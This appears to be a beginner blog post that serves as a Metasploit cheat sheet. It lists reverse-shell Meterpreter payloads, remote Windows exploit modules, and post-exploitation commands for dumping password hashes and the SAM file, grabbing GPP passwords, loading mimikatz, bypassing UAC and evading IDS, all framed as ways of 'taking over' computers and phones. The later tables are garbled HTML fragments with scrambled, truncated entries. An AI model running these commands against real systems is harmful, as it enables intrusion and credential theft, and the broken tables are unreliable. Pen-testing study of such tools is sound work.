• Home
  • /
  • Blog
  • /
  • MetaSploit Commands and Meterpreter Payloads – MetaSploit for Beginners

MetaSploit Commands and Meterpreter Payloads – MetaSploit for Beginners

by Mubi 

MetaSploit Commands and Meterpreter Payloads - MetaSploit for Beginners

Pen testers and security researchers favor the Metasploit framework for its advanced capabilities. H.D. Moore originally developed Metasploit in Perl, but it transitioned to Ruby in 2007. Its popularity soared, leading to its acquisition by Rapid7, a renowned security company, in 2009.

Metasploit provides a complete suite of tools for penetration testing and hacking, enabling users to exploit remote machines and web applications. This framework stands out for its sophistication and extensive features, making it a go-to tool for hackers and researchers alike. Each module in Metasploit offers a range of actions, allowing for versatile and powerful penetration testing.

For beginners, we’ve compiled a list of commonly used Metasploit commands and Meterpreter payloads to help you get started with practice and execution. This guide will introduce you to the essential commands that will streamline your workflow and enhance your penetration testing skills.

MetaSploit for Beginners

There’s three types of Metasploit commands.

  1. Basic commands (These are the very basic operation commands like search, help, info and exit.)
  2. Exploit commands (Exploit commands are the ones used to check out all the exploit options, payloads and targets.)
  3. Exploit execution commands (These are post exploit commands that exploits and execute different operations on a target machine.)

Related: Kali Linux for Android

All the most commonly used and Metasploit Basic, Exploit and Exploit Execuation commands for beginners to learn are:

  • First of all, to update the Metasploit framework to it’s latest version. Execute the following command.
apt update; apt install metasploit-framework
  • To check out all the msfconsole and metasploit options, use the following help command.
  • Metasploit search command is used to search for exploits and vulnerabilities from msfconsole.
  • To see a list of all the payload options to attack a target machine.
show options</strong>

  • The following command is used to check and set listening IP and PORT of the HOST machine to set a static IP and port forwarding to any specified port.
  • To check out the list all the payloads for an exploit.
<strong>show payloads


  • To fi

nd all the vulnerable operating systems to a specified exploit.


show targets
  • To show advanced options and commands for exploit.
show advanced
  • Show encoders command returns all the encoders. Encoders used for evading simple IDS/IPS signatures that are looking for certain bytes of your payload.
show encoders
  • This command will give a list of Nop generators. It is used to change the pattern of a NOP sled in order to bypass simple IDS/IPS signatures of common NOP.
show nops

MetaSploit Command & Meterpreter Payloads

Windows Reverse Meterpreter Payload

Command Description
set payload windows/meterpreter/reverse_tcp Used for Reverse TCP Windows Payload

Android Reverse Meterpreter Payload

Command Description
set payload android/meterpreter/reverse_tcp Used for Reverse TCP Android Payload

Windows VNC Meterpreter Payload

Command Description
set payload windows/vncinject/reverse_tcpset ViewOnly false Used for Reverse TCP Windows VNC Payload

Linux Reverse Meterpreter Payload

Command Description
set payload linux/meterpreter/reverse_tcp Used for Reverse TCP Linux Payload

Meterpreter Commands

Check out the most useful and commonly used meterpreter commands.

Command Description
upload file c:\\windows Meterpreter command for uploading file to a Windows OS target machine.
download c:\\windows\\repair\\sam /tmp Meterpreter command for downloading file from a Windows OS target device.
execute -f c:\\windows\temp\exploit.exe To execute exploits on a remote victim machine.
execute -f cmd -c To create a new channel with cmd shell.
ps Shows all the Meterpreter processes.
shell Meterpreter get shell on the target.
getsystem This meterpreter command attempts the priviledge escalation on the target device.
hashdump It is used to dump hashes on the target system.
portfwd add –l 3389 –p 3389 –r target Meterpreter command for port forwarding to victim machine.
portfwd delete –l 3389 –p 3389 –r target Meterpreter removes port forwarding.

MetaSploit Exploits

Explore all of the most commonly used metasploit exploits.

Remote Windows MetaSploit Exploits

All the exploits for attacking a WindowsOS machines remotely.

Command Description
use exploit/windows/smb/ms08_067_netapi Remote Exploit for the machines with Windows versions MS08_067 Windows 2k, XP, 2003
use exploit/windows/dcerpc/ms06_040_netapi Remote Exploit for the machines with Windows versions MS08_040 Windows NT, 2k, XP, 2003
use exploit/windows/smb/
Remote Exploit for the machines with Windows versions MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86)

Post Exploit Windows Metasploit Modules

Command Description
run post/windows/gather/win_privs Metasploit command to show all the privileges and permissions of the current user.
use post/windows/gather/credentials/gpp This Metasploit command grabs all GPP saved passwords.
load mimikatz -> wdigest Metasplit loads Mimikatz.
run post/windows/gather/local_admin_search_enum Searches all machines with administrative access.

Local Windows MetaSploit Exploits

Exploits to work with a local machine.

Command Description
use exploit/windows/local/bypassuac Used for UAC (User Account Control) Bypass on Windows 7 systems.

Auxilary MetaSploit Modules

<tr>use auxiliary/scanner/oracle/oracle_loginMetasploit scanner used for Oracle Login Module.


CommandDescriptionuse auxiliary/scanner/http/dir_scannerMetasploit scanner tool used to scan HTTP directory.use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS used for vulnerability scanning.</td>use auxiliary/scanner/mssql/mssql_loginMetasploit Credential Scanner tool used for MSSQL.</td>

Metasploit Powershell Exploits&lt;/strong></h3></strong>

ription</thead>&lt;tbody&gt;Metasploit JBOSS deploy.</p>


table>There’s hundreds of more actions and commands you can play with, but these are the most commonly used Metasploit commands for taking over a computer, smartphone, web apps and more. Hope this metasploit for beginners guide would be useful for you to learn working with MetaSploit.</em>


Command</th>Descuse exploit/multi/script/web_deliveryMetasploit shell payload delivery exploit.</td>

<tr>post/windows/manage/powershell/exec_powershellUploads the shell to target and run powershell.</p>

use exploit/multi/http/jboss_maindeployeruse exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload.

About the author 

Mubi Ace

January 22, 2024

How to stay safe in an online casino

November 28, 2023

Decoding Snapchat Slang: What Does Ft Mean On Snapchat?

November 14, 2023

How Can You See If Someone Is Not Following You On Facebook?
Leave a Reply

Your email address will not be published. Required fields are marked

The reCAPTCHA verification period has expired. Please reload the page.

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}
Complete Guide To XSS Cross Site Scripting
How to Hack a Website using Remote File Inclusion (RFI)
How Online Slots Have Changed Video Gaming
How to stay safe in an online casino
How To Delete Albums On Your iPhone?
Share via
Copy link
Powered by Social Snap